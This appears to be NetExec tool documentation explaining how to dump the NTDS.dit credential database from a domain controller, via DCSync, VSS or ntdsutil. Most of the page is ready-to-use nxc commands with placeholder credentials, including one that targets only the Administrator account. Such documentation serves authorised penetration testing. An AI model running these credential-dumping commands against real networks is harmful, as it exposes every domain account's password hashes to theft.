Dump NTDS.dit

Dump the NTDS.dit from target DC using methods from secretsdump.py

2 methods are available:   
(default) 	drsuapi -  Uses drsuapi RPC interface create a handle, trigger replication, and combined with   
						additional drsuapi calls to convert the resultant linked-lists into readable format  
			vss - Uses the Volume Shadow copy Service  

Dump all users from the NTDS.dit

nxc smb 192.168.1.100 -u UserName -p 'PASSWORDHERE' --ntds
nxc smb 192.168.1.100 -u UserName -p 'PASSWORDHERE' --ntds --enabled
nxc smb 192.168.1.100 -u UserName -p 'PASSWORDHERE' --ntds vss

You can also DCSYNC with the computer account of the DC

Dump a specific user only

nxc smb 192.168.1.100 -u UserName -p 'PASSWORDHERE' --ntds --user Administrator

There is also the ntdsutil module that will use ntdsutil to dump NTDS.dit and SYSTEM hive and parse them locally with secretsdump.py

nxc smb 192.168.1.100 -u UserName -p 'PASSWORDHERE' -M ntdsutil

Last updated

Was this helpful?